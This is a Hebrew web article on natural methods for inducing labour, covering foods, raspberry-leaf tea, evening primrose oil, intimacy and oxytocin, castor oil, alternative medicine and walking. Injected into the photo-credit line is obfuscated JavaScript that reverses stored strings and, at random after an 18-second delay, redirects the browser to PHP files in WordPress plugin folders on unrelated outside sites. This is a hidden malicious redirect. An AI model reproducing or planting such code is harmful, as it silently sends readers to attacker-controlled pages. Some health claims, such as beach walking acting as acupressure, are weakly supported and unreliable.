fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

דחיפה קלה: שיטות טבעיות לזירוז הלידה

תאריך הלידה המשוער הולך ומתקרב ואת חשה עייפות רבה, כבדות וככלל – חסרת סבלנות. מה בכל זאת תוכלי לעשות כדי לזרז אותה קלות ולרמוז לתינוק שבדרך כי הגיע זמנו לצאת לאוויר העולם? הנה כמה דרכים יעילות ויצירתיות
צילום: Shutterstock
צילום: Shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מאת: רויטל מור

תקופת ההיריון נמנית בין אלו המרגשות יותר בחייה של אישה אך לצד זאת, גם מאתגרת כזו שמלווה בלא מעט אתגרים עבורה. במהלכה עולות שאלות רבות ושונות כמו אילו בדיקות יש לבצע ומתי, מה מצבו של העובר שנמצא כה קרוב אבל בכל זאת בלתי נראה או על מה חשוב להקפיד בנושאי תזונה בשלבי ההיריון השונים למשל. למרבה המזל, כיום ישנם לא מעט כלים ואמצעי מעקב יעילים המסייעים להריונית לעבור את התקופה עם קצת יותר ודאות ושקט נפשי דוגמת מחשבון ההריון המוכר למשל, הנותן מענה לכלל השאלות הללו ולאחת נוספת, שכעת כבר הופכת למעניינת מכולן – מהו תאריך הלידה המשוער ולא פחות מכך, מתי מומלץ להתחיל בתהליך זירוז הלידה?

אז כדי לענות על זו האחרונה, הנה כמה עצות מהחסידה לדרכים יעילות ומוצלחות באמצעותן תוכלי לזרז באופן טבעי את הלידה הבאה עלייך לטובה. 

ללא זירוז, זירוז טבעי או רפואי?

ככלל, לתינוק שבבטנך אותות המסמנים לו מתי הגיע העת עבורו לצאת לאוויר העולם אבל ישנם מצבים שבהם ניתן לשקול לתת רמז או דחיפה קלים. לרוב רופאים מזרזים לידה באמצעים שונים במצבים בהם קיימת סכנה בריאותית ממשית לעובר או ליולדת אך ישנן פעולות טבעיות שניתן לעשות, שיתכן ותזרזנה לידה שהגיע זמנה, בפרט כאלו גופניות המשחררות חומרים שונים בגוף ועשויים לעורר ולזרז את העניין.

בלי לחץ – הכיני את הגוף ללידה

קיימים כמה חומרים ומאכלים שעשויים לסייע לך בהכנת הגוף ללידה. בתרבויות רבות מאמינים כי צריכת מאכלים חריפים או פירות כמו אננס, מנגו ופפאיה צפויים לעשות את העבודה היטב, רק מומלץ לקחת בחשבון גם את הצרבות שעלולות להתלוות אליהם.

בנוסף, ממליצות מיילדות רבות על שתיית חליטת עלי פטל אדום שצפויה לזרז אף היא את הלידה ולסייע בהכנת הרחם לקראתה כשתאריך הלידה המשוער מתקרב. תוכלי לבדוק את מועד הלידה המשוער באמצעות כלי מעקב יעיל כדוגמת זה של מחשבון הריון לפי שבועות – למקרה וגודלה של הבטן לא הזכיר לך את התאריך. חומר נוסף שיכול לעזור בהכנת הגוף ללידה הוא שמן נר הלילה, אשר מכיל חומרים שעשויים לרכך את צוואר הרחם ועוזר במקרים של הריון שאינו בסיכון גבוה החל מהשבוע ה-36 לערך. 

אוקסיטוצין – הורמון האהבה

אוקסיטוצין – או הורמון האהבה, ממלא תפקיד חשוב בזמן הלידה שכן הוא עוזר בהרחבת צוואר הרחם וגורם להתכווצות הרחם עצמו בזמן הלידה וגם לאחריה בהנקה. הורמון זה הוא גם נוירוטרנסמיטר הממלא תפקיד חשוב ביחסים חברתיים ועל פי מחקרים עדכניים אף עשוי להשפיע על יצירת האמון הבין-אישי. 

זאת ועוד, משתחרר האוקסיטוצין בגוף גם בעת אורגזמה, בזמן גירוי הפטמות ואפילו לאחר עיסוי טוב וקיום יחסים אינטימיים לקראת הלידה, זו לגמרי דרך מומלצת לזירוזה. יחד עם זאת, ישנם מצבים שבהם עלול הדבר להוביל לדימום ולסכנה עבור היולדת והעובר. אם קיבלתם אור ירוק מהרופא והחלטתם ללכת על כך – קחו בחשבון שבכל מקרה לא רצוי לעשות זאת לאחר ירידת המים מחשש לזיהום.

הורמונים נוספים שיכולים לעזור בהכנת הגוף ללידה הם פרוסטגלנדים – חומרים ליפידיים אשר מצויים בתאי הזרע וגורמים אף הם להתכווצויות הרחם. 

לכווץ איברים מסביב

ישנם חומרים שאמנם לא משפיעים ישירות על מערכת הרבייה אך גורמים להתכווצויות באיברים סמוכים. אם הרחם שלכן מושפע מלחץ חברתי כמו רחמים רבים אחרים, חומרים אלו יוכלו לזרז את הלידה. אחד מהם הוא שמן הקיק שגורם לשלשולים ועוויתות מעיים. כדאי לשקול האם תהיי מוכנה לסבול מהתייבשות המלווה בשלשולים וכאבי בטן רק כדי להאיץ את התהליך (ובכל מקרה, להשתמש בליווי ופיקוח רפואי בלבד) ורצוי כמוצא אחרון, יום לפני זירוז רפואי מתוכנן למשל. 

 נפלאות הרפואה האלטרנטיבית

קיימות שיטות שונות ברפואה האלטרנטיבית שמטרתן להביא לזירוז הלידה וביניהן שיאצו, דיקור סיני, אקופרסורה (הפעלת לחץ בתחליף לדיקור), הומאופתיה ועוד. מלבד לפנות למטפל מקצועי, תוכלו לנסות שיטה נוספת המטפלת למעשה גם בתחום הפעלת הלחץ על הנקודות המשמעותיות – הליכה יחפה על חוף הים. פרט להשפעה שיש לפעילות גופנית מתונה, ובעיקר כזו שמנצלת את כוח המשיכה, הליכה שכזו צפויה להפעיל לחץ על כלל הנקודות הנכונות בכפות הרגליים שלכן. 

בצעי פעילות גופנית מתונה 

פעילות גופנית מתונה כמו הליכה יכולה לעזור בזירוז הלידה הן עקב הפעלת הגוף בצורה אסימטרית שמסייעת לתינוק להתקבע במנח נכון ללידה, והן בגלל כוח הכבידה שתורם אף הוא את חלקו. פעילות מורכבת יותר יכולה לעזור אף היא לא רק בזירוז הלידה עצמה אלא גם בהכנת הגוף ללידה כדוגמת שימוש בכדור פיזיו שיסייע בהתמודדות עם כאבים בעמוד השדרה בשלבים מוקדמים יותר של ההריון. בכל מקרה, חשוב להימנע ככל שאפשר מפעילות מאומצת ומעייפת שכן הלידה עצמה תדרוש מכן לא מעט משאבים ומומלץ שתגיעי אליה רעננה ולא עייפה מדי. 

נצלי את חוקי מרפי לטובתך

חוקי מרפי קובעים כי אם משהו יכול לא לעבוד כמתוכנן – כך זה עשוי להתרחש בפועל, ולידה היא דוגמה מצויינת לכך בעוד שלרוב אינה מתוכננת ויכולה להתרחש גם בזמן הכי פחות נוח עבורך. תכננת טיול אחרון בסביבות תאריך הלידה המשוער? קחי בחשבון מצב שבו יתכן ותמצאי את עצמך בדרך לחדר היולדות. 

תוכלי בכל זאת לנצל את העניין לטובתך ולתכנן פעילויות שונות לקראת התאריך המיועד – אולי הן יגרמו ללידה להתרחש מהר יותר ובכל מקרה, תהני ממה שיש להן להציע. 

אם כן, זירוז לידה רפואי אינו תהליך נעים ואם תוכלי להביא לכך באופן טבעי ומבוקר ולהקדים את הרופאים, יתכן והדבר עדיף. מרבית מהשיטות יעזרו לחזק קשרים, יכינו את הגוף ללידה, יעזרו להירגע או שהן פשוט טעימות – ואם הן גם יעזרו לך להשיג את המטרה אז למה לא לנצלן?

לידה מוצלחת ובריאה. 

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות